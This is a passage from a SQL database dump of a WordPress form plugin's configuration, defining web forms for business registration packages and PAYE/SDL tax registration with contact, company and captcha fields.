Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*4*:*id*:*type_text*:*type*:*Contact Number*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:*Contact Number*:*w_first_val*:*Contact Number*:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*6*:*id*:*type_checkbox*:*type*:*Business &amp; Tax*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*right*:*w_field_option_pos*:*no*:*w_hide_label*:*ver*:*w_flow*:*Income Tax registration***Name reservation***Company registration***Tax Clearance***BEE Affidavit***Share Certificate***Share register***Vat registration***PAYE registration*:*w_choices*:*false***false***false***false***false***false***false***false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Income Tax registration***Name reservation***Company registration***Tax Clearance***BEE Affidavit***Share Certificate***Share register***Vat registration***PAYE registration*:*w_choices_value*:**************************:*w_choices_params*:**:*w_class*:**:*new_field*:*8*:*id*:*type_checkbox*:*type*:*Cloud Applications*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*right*:*w_field_option_pos*:*no*:*w_hide_label*:*ver*:*w_flow*:*Messages &amp; Appointments***Employee Management***Work &amp; Tasks Management***Online Accounting***Device Management*:*w_choices*:*false***false***false***false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Messages & Appointments***Employee Management***Work & Tasks Management***Online Accounting***Device Management*:*w_choices_value*:**************:*w_choices_params*:**:*w_class*:**:*new_field*:*7*:*id*:*type_radio*:*type*:*Radio:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*right*:*w_field_option_pos*:*yes*:*w_hide_label*:*hor*:*w_flow*:*Business Registrations***Tax Services***Cloud Applications***Web Design***Online Marketing*:*w_choices*:*false***false***false***false***false*:*w_choices_checked*:*5*:*w_rowcol*:*yes*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Business Registrations***Tax Services***Cloud Applications***Web Design***Online Marketing*:*w_choices_value*:**************:*w_choices_params*:**:*w_class*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1,'Choose Your Options','','','fadeInLeft',0),(52,0,14,'Customize package','','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Custom Package\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"1\" class=\"wdform_row ui-sortable-handle\">%1 - Name%</div><div wdid=\"3\" class=\"wdform_row ui-sortable-handle\">%3 - Surname%</div><div wdid=\"2\" class=\"wdform_row ui-sortable-handle\">%2 - E-mail%</div><div wdid=\"4\" class=\"wdform_row ui-sortable-handle\">%4 - Contact Number%</div><div wdid=\"6\" class=\"wdform_row ui-sortable-handle\">%6 - Business &amp; Tax%</div><div wdid=\"8\" class=\"wdform_row ui-sortable-handle\">%8 - Cloud Applications%</div><div wdid=\"9\" class=\"wdform_row ui-sortable-handle\">%9 - Web Design%</div></div><div class=\"wdform_column ui-sortable\"><div wdid=\"7\" class=\"wdform_row ui-sortable-handle\">%7 - Radio:%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table; padding-top:10px;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',1,'// Occurs before the form is loaded\r\nfunction before_load() {	\r\n}	\r\n// Occurs just before submitting  the form\r\nfunction before_submit() {\r\n	// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don\'t need to return any value if you don\'t want to stop the submission.\r\n}	\r\n// Occurs just before resetting the form\r\nfunction before_reset() {	\r\n}','','',1,'%all%','%all%',10,1,'1#**id**#Name#**label**#type_text#****#3#**id**#Surname#**label**#type_text#****#2#**id**#E-mail#**label**#type_text#****#4#**id**#Contact Number#**label**#type_text#****#6#**id**#Business &amp; Tax#**label**#type_checkbox#****#8#**id**#Cloud Applications#**label**#type_checkbox#****#9#**id**#Web Design#**label**#type_checkbox#****#7#**id**#Radio:#**label**#type_radio#****##**id**##**label**##****#','1#**id**#Name#**label**#type_text#****#3#**id**#Surname#**label**#type_text#****#2#**id**#E-mail#**label**#type_text#****#4#**id**#Contact Number#**label**#type_text#****#6#**id**#Business &amp; Tax#**label**#type_checkbox#****#8#**id**#Cloud Applications#**label**#type_checkbox#****#9#**id**#Web Design#**label**#type_checkbox#****#7#**id**#Radio:#**label**#type_radio#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_text*:*type*:*Name*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:*Name*:*w_first_val*:*Name*:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*3*:*id*:*type_text*:*type*:*Surname*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:*Surname*:*w_first_val*:*Surname*:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*2*:*id*:*type_text*:*type*:*E-mail*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:*E-mail*:*w_first_val*:*E-mail*:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*4*:*id*:*type_text*:*type*:*Contact Number*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:*Contact Number*:*w_first_val*:*Contact Number*:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*6*:*id*:*type_checkbox*:*type*:*Business &amp; Tax*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*right*:*w_field_option_pos*:*no*:*w_hide_label*:*ver*:*w_flow*:*Income Tax registration***Name reservation***Company registration***Tax Clearance***BEE Affidavit***Share Certificate***Share register***Vat registration***PAYE registration*:*w_choices*:*false***false***false***false***false***false***false***false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Income Tax registration***Name reservation***Company registration***Tax Clearance***BEE Affidavit***Share Certificate***Share register***Vat registration***PAYE registration*:*w_choices_value*:**************************:*w_choices_params*:**:*w_class*:**:*new_field*:*8*:*id*:*type_checkbox*:*type*:*Cloud Applications*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*right*:*w_field_option_pos*:*no*:*w_hide_label*:*ver*:*w_flow*:*Messages &amp; Appointments***Employee Management***Work &amp; Tasks Management***Online Accounting***Device Management*:*w_choices*:*false***false***false***false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Messages & Appointments***Employee Management***Work & Tasks Management***Online Accounting***Device Management*:*w_choices_value*:**************:*w_choices_params*:**:*w_class*:**:*new_field*:*9*:*id*:*type_checkbox*:*type*:*Web Design*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*right*:*w_field_option_pos*:*no*:*w_hide_label*:*ver*:*w_flow*:*Basic Page***Full Website***E-Commerce ***Email Marketing*:*w_choices*:*false***false***false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Basic Page***Full Website***E-Commerce ***Email Marketing*:*w_choices_value*:***********:*w_choices_params*:**:*w_class*:**:*new_field*:*7*:*id*:*type_radio*:*type*:*Radio:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*right*:*w_field_option_pos*:*yes*:*w_hide_label*:*hor*:*w_flow*:*Business &amp; Tax Services***Cloud Applications***Web Design***Online Marketing*:*w_choices*:*false***false***false***false*:*w_choices_checked*:*5*:*w_rowcol*:*yes*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Business &amp; Tax Services***Cloud Applications***Web Design***Online Marketing*:*w_choices_value*:***********:*w_choices_params*:**:*w_class*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1,'Choose Your Options','','','fadeInLeft',0),(53,0,14,'Customize package','','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Custom Package\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"1\" class=\"wdform_row ui-sortable-handle\">%1 - Name%</div><div wdid=\"3\" class=\"wdform_row ui-sortable-handle\">%3 - Surname%</div><div wdid=\"2\" class=\"wdform_row ui-sortable-handle\">%2 - E-mail%</div><div wdid=\"4\" class=\"wdform_row ui-sortable-handle\">%4 - Contact Number%</div><div wdid=\"6\" class=\"wdform_row ui-sortable-handle\">%6 - Business &amp; Tax%</div><div wdid=\"8\" class=\"wdform_row ui-sortable-handle\">%8 - Cloud Applications%</div><div wdid=\"9\" class=\"wdform_row ui-sortable-handle\">%9 - Web Design%</div></div><div class=\"wdform_column ui-sortable\"><div wdid=\"7\" class=\"wdform_row ui-sortable-handle\">%7 - Radio:%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table; padding-top:10px;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',1,'// Occurs before the form is loaded\r\nfunction before_load() {	\r\n}	\r\n// Occurs just before submitting  the form\r\nfunction before_submit() {\r\n	// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don\'t need to return any value if you don\'t want to stop the submission.\r\n}	\r\n// Occurs just before resetting the form\r\nfunction before_reset() {	\r\n}','','',1,'%all%','%all%',10,1,'1#**id**#Name#**label**#type_text#****#3#**id**#Surname#**label**#type_text#****#2#**id**#E-mail#**label**#type_text#****#4#**id**#Contact Number#**label**#type_text#****#6#**id**#Business &amp; Tax#**label**#type_checkbox#****#8#**id**#Cloud Applications#**label**#type_checkbox#****#9#**id**#Web Design#**label**#type_checkbox#****#7#**id**#Radio:#**label**#type_radio#****##**id**##**label**##****#','1#**id**#Name#**label**#type_text#****#3#**id**#Surname#**label**#type_text#****#2#**id**#E-mail#**label**#type_text#****#4#**id**#Contact Number#**label**#type_text#****#6#**id**#Business &amp; Tax#**label**#type_checkbox#****#8#**id**#Cloud Applications#**label**#type_checkbox#****#9#**id**#Web Design#**label**#type_checkbox#****#7#**id**#Radio:#**label**#type_radio#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_text*:*type*:*Name*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:*Name*:*w_first_val*:*Name*:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*3*:*id*:*type_text*:*type*:*Surname*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:*Surname*:*w_first_val*:*Surname*:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*2*:*id*:*type_text*:*type*:*E-mail*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:*E-mail*:*w_first_val*:*E-mail*:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*4*:*id*:*type_text*:*type*:*Contact Number*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:*Contact Number*:*w_first_val*:*Contact Number*:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*6*:*id*:*type_checkbox*:*type*:*Business &amp; Tax*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*right*:*w_field_option_pos*:*no*:*w_hide_label*:*ver*:*w_flow*:*Income Tax registration***Name reservation***Company registration***Tax Clearance***BEE Affidavit***Share Certificate***Share register***Vat registration***PAYE registration*:*w_choices*:*false***false***false***false***false***false***false***false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Income Tax registration***Name reservation***Company registration***Tax Clearance***BEE Affidavit***Share Certificate***Share register***Vat registration***PAYE registration*:*w_choices_value*:**************************:*w_choices_params*:**:*w_class*:**:*new_field*:*8*:*id*:*type_checkbox*:*type*:*Cloud Applications*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*right*:*w_field_option_pos*:*no*:*w_hide_label*:*ver*:*w_flow*:*Messages &amp; Appointments***Employee Management***Work &amp; Tasks Management***Online Accounting***Device Management*:*w_choices*:*false***false***false***false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Messages & Appointments***Employee Management***Work & Tasks Management***Online Accounting***Device Management*:*w_choices_value*:**************:*w_choices_params*:**:*w_class*:**:*new_field*:*9*:*id*:*type_checkbox*:*type*:*Web Design*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*right*:*w_field_option_pos*:*no*:*w_hide_label*:*ver*:*w_flow*:*Basic Page***Full Website***E-Commerce ***Email Marketing*:*w_choices*:*false***false***false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Basic Page***Full Website***E-Commerce ***Email Marketing*:*w_choices_value*:***********:*w_choices_params*:**:*w_class*:**:*new_field*:*7*:*id*:*type_radio*:*type*:*Radio:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*right*:*w_field_option_pos*:*yes*:*w_hide_label*:*hor*:*w_flow*:*Business &amp; Tax Services***Cloud Applications***Web Design***Online Marketing*:*w_choices*:*false***false***false***false*:*w_choices_checked*:*5*:*w_rowcol*:*yes*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Business & Tax Services***Cloud Applications***Web Design***Online Marketing*:*w_choices_value*:***********:*w_choices_params*:**:*w_class*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1,'Choose Your Options','','','fadeInLeft',0),(64,0,16,'PAYE Registration','','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"1\" class=\"wdform_row ui-sortable-handle\">%1 - Name:%</div><div wdid=\"2\" class=\"wdform_row ui-sortable-handle\">%2 - E-mail:%</div><div wdid=\"14\" class=\"wdform_row ui-sortable-handle\">%14 - Postal Address%</div></div><div class=\"wdform_column ui-sortable\"><div wdid=\"3\" class=\"wdform_row ui-sortable-handle\">%3 - Phone:%</div><div wdid=\"16\" class=\"wdform_row ui-sortable-handle\">%16 - Cell Number%</div><div wdid=\"17\" class=\"wdform_row ui-sortable-handle\">%17 - Fax Number%</div></div></div><div wdid=\"4\" type=\"type_section_break\" class=\"wdform_tr_section_break\">%4 - custom_4%</div><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"5\" class=\"wdform_row ui-sortable-handle\">%5 - Company Name%</div><div wdid=\"6\" class=\"wdform_row ui-sortable-handle\">%6 - Company Registration Number%</div><div wdid=\"8\" class=\"wdform_row ui-sortable-handle\">%8 - Address:%</div><div wdid=\"22\" class=\"wdform_row ui-sortable-handle\">%22 - Would you like to register for PAYE only?%</div><div wdid=\"20\" class=\"wdform_row ui-sortable-handle\">%20 - PAYE Liability Date%</div><div wdid=\"23\" class=\"wdform_row ui-sortable-handle\">%23 - Would you like to register for both PAYE and SDL?%</div><div wdid=\"21\" class=\"wdform_row ui-sortable-handle\">%21 - SDL Liability Date%</div><div wdid=\"25\" class=\"wdform_row ui-sortable-handle\">%25 - Word Verification:%</div><div wdid=\"26\" class=\"wdform_row ui-sortable-handle\">%26 - type_submit_reset_26%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table; padding-top:10px;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',1,'// Occurs before the form is loaded\r\nfunction before_load() {	\r\n}	\r\n// Occurs just before submitting  the form\r\nfunction before_submit() {\r\n	// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don\'t need to return any value if you don\'t want to stop the submission.\r\n}	\r\n// Occurs just before resetting the form\r\nfunction before_reset() {	\r\n}','','',1,'%all%','%all%',27,1,'1#**id**#Name:#**label**#type_name#****#2#**id**#E-mail:#**label**#type_submitter_mail#****#14#**id**#Postal Address#**label**#type_text#****#3#**id**#Phone:#**label**#type_phone#****#16#**id**#Cell Number#**label**#type_text#****#17#**id**#Fax Number#**label**#type_text#****#5#**id**#Company Name#**label**#type_text#****#6#**id**#Company Registration Number#**label**#type_text#****#8#**id**#Street Address#**label**#type_address#****#9#**id**#Street Address Line 2#**label**#type_address#****#10#**id**#City#**label**#type_address#****#11#**id**#State / Province / Region#**label**#type_address#****#12#**id**#Postal / Zip Code#**label**#type_address#****#13#**id**#Country#**label**#type_address#****#22#**id**#Would you like to register for PAYE only?#**label**#type_radio#****#20#**id**#PAYE Liability Date#**label**#type_text#****#23#**id**#Would you like to register for both PAYE and SDL?#**label**#type_radio#****#21#**id**#SDL Liability Date#**label**#type_text#****#25#**id**#Word Verification:#**label**#type_arithmetic_captcha#****#26#**id**#type_submit_reset_26#**label**#type_submit_reset#****##**id**##**label**##****#','1#**id**#Name:#**label**#type_name#****#2#**id**#E-mail:#**label**#type_submitter_mail#****#14#**id**#Postal Address#**label**#type_text#****#3#**id**#Phone:#**label**#type_phone#****#16#**id**#Cell Number#**label**#type_text#****#17#**id**#Fax Number#**label**#type_text#****#5#**id**#Company Name#**label**#type_text#****#6#**id**#Company Registration Number#**label**#type_text#****#8#**id**#Street Address#**label**#type_address#****#9#**id**#Street Address Line 2#**label**#type_address#****#10#**id**#City#**label**#type_address#****#11#**id**#State / Province / Region#**label**#type_address#****#12#**id**#Postal / Zip Code#**label**#type_address#****#13#**id**#Country#**label**#type_address#****#22#**id**#Would you like to register for PAYE only?#**label**#type_radio#****#20#**id**#PAYE Liability Date#**label**#type_text#****#23#**id**#Would you like to register for both PAYE and SDL?#**label**#type_radio#****#21#**id**#SDL Liability Date#**label**#type_text#****#25#**id**#Word Verification:#**label**#type_arithmetic_captcha#****#26#**id**#type_submit_reset_26#**label**#type_submit_reset#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_name*:*type*:*Name:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:***********:*w_first_val*:***********:*w_title*:*Title***First***Last***Middle*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:*no***no*:*w_name_fields*:*no*:*w_autofill*:**:*new_field*:*2*:*id*:*type_submitter_mail*:*type*:*E-mail:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:*no*:*w_verification*:*E-mail confirmation:*:*w_verification_label*:**:*w_verification_placeholder*:*no*:*w_autofill*:**:*new_field*:*14*:*id*:*type_text*:*type*:*Postal Address*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*3*:*id*:*type_phone*:*type*:*Phone:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*135*:*w_size*:*****:*w_first_val*:*****:*w_title*:*Area Code***Phone Number*:*w_mini_labels*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*16*:*id*:*type_text*:*type*:*Cell Number*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*17*:*id*:*type_text*:*type*:*Fax Number*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*4*:*id*:*type_section_break*:*type*:*custom_4*:*w_field_label*:*<div class=\"wdform-section-break-div\" style=\"min-width: 300px; border-top:1px solid\"></div>*:*w_editor*:**:*new_field*:*5*:*id*:*type_text*:*type*:*Company Name*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*6*:*id*:*type_text*:*type*:*Company Registration Number*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*8*:*id*:*type_address*:*type*:*Address:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*300*:*w_size*:*Street Address***Street Address Line 2***City***State / Province / Region***Postal / Zip Code***Country*:*w_mini_labels*:*no***no***no***no***no***no***no*:*w_disabled_fields*:*yes*:*w_required*:*wdform_address*:*w_class*:**:*new_field*:*22*:*id*:*type_radio*:*type*:*Would you like to register for PAYE only?*:*w_field_label*:*300*:*w_field_label_size*:*top*:*w_field_label_pos*:*right*:*w_field_option_pos*:*no*:*w_hide_label*:*hor*:*w_flow*:*yes***no*:*w_choices*:*false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*yes***no*:*w_choices_value*:*****:*w_choices_params*:**:*w_class*:**:*new_field*:*20*:*id*:*type_text*:*type*:*PAYE Liability Date*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*23*:*id*:*type_radio*:*type*:*Would you like to register for both PAYE and SDL?*:*w_field_label*:*400*:*w_field_label_size*:*top*:*w_field_label_pos*:*left*:*w_field_option_pos*:*no*:*w_hide_label*:*hor*:*w_flow*:*yes***no*:*w_choices*:*false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*yes***no*:*w_choices_value*:*****:*w_choices_params*:**:*w_class*:**:*new_field*:*21*:*id*:*type_text*:*type*:*SDL Liability Date*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*25*:*id*:*type_arithmetic_captcha*:*type*:*Word Verification:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*yes*:*w_hide_label*:*2*:*w_count*:*+, -,*:*w_operations*:**:*w_class*:*60*:*w_input_size*:**:*new_field*:*26*:*id*:*type_submit_reset*:*type*:*type_submit_reset_26*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*true*:*w_act*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1,'PAYE Registration','','','none',0),(65,0,16,'PAYE Registration','','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"1\" class=\"wdform_row ui-sortable-handle\">%1 - Name:%</div><div wdid=\"2\" class=\"wdform_row ui-sortable-handle\">%2 - E-mail:%</div></div><div class=\"wdform_column ui-sortable\"><div wdid=\"3\" class=\"wdform_row ui-sortable-handle\">%3 - Phone:%</div><div wdid=\"16\" class=\"wdform_row ui-sortable-handle\">%16 - Cell Number%</div><div wdid=\"17\" class=\"wdform_row ui-sortable-handle\">%17 - Fax Number%</div></div></div><div wdid=\"4\" type=\"type_section_break\" class=\"wdform_tr_section_break\">%4 - custom_4%</div><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"5\" class=\"wdform_row ui-sortable-handle\">%5 - Company Name%</div><div wdid=\"6\" class=\"wdform_row ui-sortable-handle\">%6 - Company Registration Number%</div><div wdid=\"22\" class=\"wdform_row ui-sortable-handle\">%22 - Would you like to register for PAYE only?%</div><div wdid=\"20\" class=\"wdform_row ui-sortable-handle\">%20 - PAYE Liability Date%</div><div wdid=\"23\" class=\"wdform_row ui-sortable-handle\">%23 - Would you 